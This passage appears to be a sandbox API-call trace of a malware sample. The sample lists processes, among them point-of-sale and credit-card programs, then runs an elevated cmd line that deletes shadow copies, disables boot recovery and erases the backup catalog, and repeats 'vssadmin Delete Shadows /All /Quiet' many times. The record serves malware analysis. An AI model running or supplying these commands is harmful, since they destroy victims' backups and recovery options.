pszPath="poor_language_surface.exe" | out: pszPath="poor_language_surface") [0063.960] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="base news.exe")) returned 1 [0063.961] PathRemoveExtensionA (in: pszPath="base news.exe" | out: pszPath="base news") [0063.961] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchenroom.exe")) returned 1 [0063.963] PathRemoveExtensionA (in: pszPath="kitchenroom.exe" | out: pszPath="kitchenroom") [0063.963] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0063.964] PathRemoveExtensionA (in: pszPath="utg2.exe" | out: pszPath="utg2") [0063.964] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0063.965] PathRemoveExtensionA (in: pszPath="spgagentservice.exe" | out: pszPath="spgagentservice") [0063.965] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0063.967] PathRemoveExtensionA (in: pszPath="spcwin.exe" | out: pszPath="spcwin") [0063.967] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0063.968] PathRemoveExtensionA (in: pszPath="omnipos.exe" | out: pszPath="omnipos") [0063.968] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0064.043] PathRemoveExtensionA (in: pszPath="mxslipstream.exe" | out: pszPath="mxslipstream") [0064.043] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0064.045] PathRemoveExtensionA (in: pszPath="isspos.exe" | out: pszPath="isspos") [0064.045] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0064.047] PathRemoveExtensionA (in: pszPath="fpos.exe" | out: pszPath="fpos") [0064.047] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0064.049] PathRemoveExtensionA (in: pszPath="edcsvr.exe" | out: pszPath="edcsvr") [0064.049] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0064.050] PathRemoveExtensionA (in: pszPath="creditservice.exe" | out: pszPath="creditservice") [0064.050] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0064.051] PathRemoveExtensionA (in: pszPath="centralcreditcard.exe" | out: pszPath="centralcreditcard") [0064.051] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0064.052] PathRemoveExtensionA (in: pszPath="ccv_server.exe" | out: pszPath="ccv_server") [0064.052] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0064.056] PathRemoveExtensionA (in: pszPath="aldelo.exe" | out: pszPath="aldelo") [0064.056] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0064.057] PathRemoveExtensionA (in: pszPath="afr38.exe" | out: pszPath="afr38") [0064.057] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0064.058] PathRemoveExtensionA (in: pszPath="accupos.exe" | out: pszPath="accupos") [0064.058] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0064.059] PathRemoveExtensionA (in: pszPath="active-charge.exe" | out: pszPath="active-charge") [0064.059] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0064.060] PathRemoveExtensionA (in: pszPath="yahoomessenger.exe" | out: pszPath="yahoomessenger") [0064.060] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0064.061] PathRemoveExtensionA (in: pszPath="winscp.exe" | out: pszPath="winscp") [0064.061] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0064.063] PathRemoveExtensionA (in: pszPath="whatsapp.exe" | out: pszPath="whatsapp") [0064.063] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0064.064] PathRemoveExtensionA (in: pszPath="webdrive.exe" | out: pszPath="webdrive") [0064.064] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0064.065] PathRemoveExtensionA (in: pszPath="trillian.exe" | out: pszPath="trillian") [0064.065] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0064.066] PathRemoveExtensionA (in: pszPath="thunderbird.exe" | out: pszPath="thunderbird") [0064.066] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0064.067] PathRemoveExtensionA (in: pszPath="smartftp.exe" | out: pszPath="smartftp") [0064.067] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0064.067] PathRemoveExtensionA (in: pszPath="skype.exe" | out: pszPath="skype") [0064.068] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0064.071] PathRemoveExtensionA (in: pszPath="scriptftp.exe" | out: pszPath="scriptftp") [0064.071] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0064.072] PathRemoveExtensionA (in: pszPath="pidgin.exe" | out: pszPath="pidgin") [0064.072] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x244, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0064.073] PathRemoveExtensionA (in: pszPath="WmiPrvSE.exe" | out: pszPath="WmiPrvSE") [0064.073] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0064.074] PathRemoveExtensionA (in: pszPath="audiodg.exe" | out: pszPath="audiodg") [0064.074] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x244, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0064.075] PathRemoveExtensionA (in: pszPath="dllhost.exe" | out: pszPath="dllhost") [0064.075] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x244, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0064.076] PathRemoveExtensionA (in: pszPath="dllhost.exe" | out: pszPath="dllhost") [0064.076] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x788, pcPriClassBase=8, dwFlags=0x0, szExeFile="0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f.exe")) returned 1 [0064.076] PathRemoveExtensionA (in: pszPath="0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f.exe" | out: pszPath="0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f") [0064.077] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0064.077] PathRemoveExtensionA (in: pszPath="conhost.exe" | out: pszPath="conhost") [0064.077] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x4e004f, th32ProcessID=0x4e0045, th32DefaultHeapID=0x54004f, th32ModuleID=0x4d0045, cntThreads=0x0, th32ParentProcessID=0x650074, pcPriClassBase=5505133, dwFlags=0x610072, szExeFile="yIcon")) returned 0 [0064.078] CloseHandle (hObject=0x170) returned 1 [0064.078] GetModuleHandleA (lpModuleName="kernel32") returned 0x75620000 [0064.079] GetProcAddress (hModule=0x75620000, lpProcName="IsWow64Process") returned 0x7563193e [0064.079] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x205f384 | out: Wow64Process=0x205f384*=1) returned 1 [0064.079] GetModuleHandleA (lpModuleName="kernel32") returned 0x75620000 [0064.079] GetProcAddress (hModule=0x75620000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x7564d620 [0064.079] Wow64DisableWow64FsRedirection (in: OldValue=0x205f740 | out: OldValue=0x205f740*=0x0) returned 1 [0064.083] ShellExecuteExA (in: pExecInfo=0x205fbfc*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x7718a0dd, lpClass="`C%wÿÿÿÿ", hkeyClass=0x7718a0ba, dwHotKey=0x74fb1c95, hIcon=0x7efac000, hMonitor=0x7efac000, hProcess=0x7efde000) | out: pExecInfo=0x205fbfc*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x7718a0dd, lpClass="`C%wÿÿÿÿ", hkeyClass=0x7718a0ba, dwHotKey=0x74fb1c95, hIcon=0x7efac000, hMonitor=0x7efac000, hProcess=0x0)) returned 1 [0075.688] Sleep (dwMilliseconds=0x3e8) [0077.347] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.347] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.349] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.349] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.349] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.349] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.350] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.350] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.350] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.350] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.350] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.350] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.350] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.350] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.351] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.351] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.351] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.351] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.351] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.351] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.351] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.351] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.352] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.352] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.352] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.352] 